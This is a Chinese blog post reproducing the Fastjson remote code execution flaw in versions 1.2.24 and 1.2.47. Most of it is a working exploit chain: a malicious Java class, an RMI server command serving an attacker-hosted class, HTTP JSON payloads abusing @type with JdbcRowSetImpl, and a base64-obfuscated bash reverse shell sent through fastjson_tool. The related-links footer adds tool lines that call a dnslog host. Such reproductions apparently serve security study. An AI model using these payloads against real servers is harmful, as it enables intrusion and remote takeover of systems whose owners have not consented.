rmi远程代码执行漏洞_fastjson远程代码执行漏洞复现

最新推荐文章于 2024-03-10 09:15:00 发布
最新推荐文章于 2024-03-10 09:15:00 发布
阅读量368 收藏
点赞数
文章标签: rmi远程代码执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39849153/article/details/111818840
版权
本文详细介绍了Fastjson的远程代码执行漏洞,包括漏洞原理、漏洞利用过程和具体的操作步骤。通过创建恶意的Java类文件,启动RMI服务,并利用Fastjson的autotype功能,可以实现远程代码执行,从而触发命令执行或反弹shell。
摘要由CSDN通过智能技术生成

漏洞原理fastjson提供了autotype功能,在请求过程中,我们可以在请求包中通过修改@type的值,来反序列化为指定的类型,而fastjson在反序列化过程中会设置和获取类中的属性,如果类中存在恶意方法,就会导致代码执行漏洞产生。

漏洞利用漏洞利用需要我们在vps上启一个RMI服务并调用class文件(class文件为我们的恶意文件)

大概过程就是

生成恶意class文件

py开启web服务

然后开启rmi服务让受害者去调用我们恶意的class文件反序列化后达到命令执行的效果

fastjson 1.2.24

创建恶意的class文件 TouchFile.java 内容如下// javac TouchFile.java

import java.lang.Runtime;

import java.lang.Process;

public class TouchFile {

static {

try {

Runtime rt = Runtime.getRuntime();

String[] commands = {"touch", "/tmp/success"};

Process pc = rt.exec(commands);

pc.waitFor();

} catch (Exception e) {

// do nothing

}

}

}

javac TouchFile.java 将他编译成class文件

命令执行成功的话将在tmp文件下生成success文件

py启动一个web服务器

然后我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.classjava -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://yourip:8000/#/TouchFile" 9999

然后发送请求包加载我们的恶意class文件达到rce的效果POST / HTTP/1.1

Host: targetip:8090

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 162

{

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://yourip:9999/TouchFile",

"autoCommit":true

}

}

或者使用fastjson_tool.jar更加方便

反弹shell

运行RMI服务,加载恶意java类java -cp fastjson_tool.jar fastjson.HRMIServer rmi服务ip 9999 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"

发送反序列化代码漏洞执行命令python3 fastjson-1.2.47_rce.py http://targetip:8090 rmi://rmi ip:9999/Object

可以看到成功加载到我们恶意的class文件成功反弹shell

fastjson 1.2.47{

"a":{

"@type":"java.lang.Class",

"val":"com.sun.rowset.JdbcRowSetImpl"

},

"b":{

"@type":"com.sun.rowset.JdbcRowSetImpl",

"dataSourceName":"rmi://rmi ip:9999/Exploit",

"autoCommit":true

}

}

也可以使用dnslog快速探测是否存在该漏洞

weixin_39849153
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FastJson远程命令执行漏洞
PassionNingG的博客
09-03 1390
fastjson漏洞其实就是fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类中连接远程主机,通过其中的恶意类执行代码。笔记只做学习记录分享。文章内容多来于如有侵权立删。# FastJson远程命令执行漏洞学习笔记fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
vulhub漏洞复现十四_fastjson
weixin_44193247的博客
01-25 1285
vulhub漏洞复现练习篇
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
Fastjson 爆出远程代码执行高危漏洞
金溪的博客
03-23 4217
fastjson近日曝出代码执行漏洞,恶意用户可利用此漏洞进行远程代码执行,入侵服务器,漏洞评级为“高危”。基本介绍fastjson一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。漏洞介绍fastjson在1.2.24以及之前版本近日曝出代码执行漏洞,当用户提交一个精心构造的恶意的序列化数据到服务器端时,fastjson在反序列化时存在漏洞,可导致远程...
rmi远程代码执行漏洞_Fastjson <=1.2.62 远程代码执行-漏洞复现
weixin_39929723的博客
12-22 314
影响范围:Fastjson<=1.2.62需要开启autotypepoc:String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";pom:com.alibabafastjson1.2.62commons-...
漏洞公告】Fastjson远程代码执行漏洞
Lam's IT Story
03-17 2163
2017年3月15日,Fastjson 官方发布安全公告,该公告介绍fastjson在1.2.24以及之前版本存在代码执行漏洞代码执行漏洞,恶意攻击者可利用此漏洞进行远程代码执行,从而进一步入侵服务器,目前官方已经发布了最新版本,最新版本已经成功修复该漏洞。 具体漏洞详情如下: 漏洞编号: 暂无 漏洞名称: Fastjson远程代码执行漏洞 官方评级: 高危 漏洞描述: fa...
漏洞名称:RMI 未授权访问漏洞
qq_36902628的博客
03-21 1742
漏洞名称:RMI 未授权访问漏洞
FastJson远程命令执行漏洞学习笔记
ch98000的博客
09-04 457
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。
fastjson框架漏洞复现
没有
10-23 2350
fastjson是阿里巴巴开源的json解析库,通常被用于java object和json字符之间进行转换,提供两个方法json.tojsonstring和json.parseobject/json.parse来分别实现序列化与反序列化。
漏洞名称-RMI 未授权访问漏洞
最新发布
qq_44005305的博客
03-10 1164
漏洞描述:RMI默认使用序列化来完成所有的交互,如果该端口暴露在公网上,且使用了Apache CommonsCollections的漏洞版本,就可以在该服务器上执行相关命令。漏洞危害:攻击者可在没有认证的情况下直接操作对应的 API接口,可直接被非法增删改次数据。且因为攻击是在未认证下进行的,所以后续无法通过定位用户进行异常排查。
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
rmi远程代码执行漏洞_Apache Struts2059远程代码执行漏洞复现
weixin_36346221的博客
12-16 91
网安引领时代,弥天点亮未来0x00漏洞简述2020年08月13日,Apache官方发布了Struts2远程代码执行漏洞的风险通告,该漏洞编号为CVE-2019-0230,漏洞等级:高危,漏洞评分:8.5。漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设...
rmi远程代码执行漏洞_Apache Dubbo 远程代码执行漏洞
weixin_32390279的博客
12-28 153
Apache Dubbo是一款应用广泛的Java RPC分布式服务框架。Apache Dubbo于2020年6月23日披露在Dubbo Provider中存在一个反序列化远程代码执行漏洞(CVE-2020-1948),攻击者可以构造并发送带有恶意参数负载的RPC请求,当恶意参数被反序列化时将导致远程代码执行。参考链接:hxxps://www.mail-rchive.com/dev@dub...
thinkphp5+远程代码执行_ThinkPHP远程代码执行漏洞
weixin_39673471的博客
11-25 423
网安引领时代,弥天点亮未来漏洞介绍ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架。Thinkphp5.x版本中存在一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令影响范围Thinkphp 5.1.0 - 5.1.31Thinkphp 5.0.5 - 5.0.2...
rmi远程代码执行漏洞_漏洞预警!Fastjson远程代码执行漏洞(哨兵云支持检测)...
weixin_36011231的博客
01-05 104
Fastjson一个阿里巴巴开源Java库,可用于实现Java对象与JSON字符串之间的相互转换。作为最快速的JSON库,Fastjson拥有大量的用户。近期,有 Fastjson远程代码执行漏洞曝出,在JSON字符串转换为等效的Java对象时漏洞触发。该漏洞无需开启AutoType即可利用成功,并且利用JNDI就可以形成完整的利用链,危害巨大。默安科技的哨兵云资产风险监控系统目前已支...
http路径转file会变成反斜杠_CVE201917564 Apache Dubbo Http 反序列化漏洞深入分析
weixin_39712611的博客
11-27 285
前言上一篇文章勉强算是把Shiro反序列化漏洞分析了一遍。由于本人是一个初学者,也没啥学习方法,只能多看几个漏洞的分析过程了。今天周末,来分析一下Dubbo框架的RCE漏洞。也许看多了,量变引发质变,也就会自己分析了吧。Dubbo简介官网:https://dubbo.apache.org/zh-cn/Apache Dubbo 是一个基于Java的高性能,轻量级的RPC框架。Dubbo提...
Java RMI 远程代码执行漏洞
LuckySec
11-30 3432
Java RMI服务远程方法调用,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程Java对象,可以从另一个Java虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,使分布在不同的JVM中的对象的外表和行为都像本地对象一样。在RMI的通信过程中,默认使用序列化来完成所有的交互,如果该服务器Java RMI端口(默认端口1099)对公网开放,且使用了存在漏洞的Apache Commo
未授权和代码执行漏洞特征和检测方法
wutiangui的博客
10-13 1314
查看在被测应用的服务器上查看应用所在目录/WEB-INF/lib/下的jar文件,若存在fastjson-1.2.*.**.jar格式的jar文件,或者抓包发现被测应用系统的响应报文中包含“com.alibaba.fastjson”字符串,则需检测是否存在fastjson反序列化漏洞。s=captcha,若响应包中包含phpinfo信息,则说明存在代码执行漏洞。依次修改URL末尾的端口号为常见的22,80,443,7001,8080等端口,若页面中根据端口号不同出现如下字符串,说明存在SSRF漏洞
【vulhub】Weblogic(CVE-2018-2628)漏洞复现
qq_45300786的博客
04-10 2536
一、什么是WebLogic WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
06-06
RMI远程反序列化RCE漏洞是指,攻击者可以通过构造恶意的序列化数据,使得服务端在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的根本原因在于Java序列化机制的设计缺陷,攻击者可以通过构造恶意的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值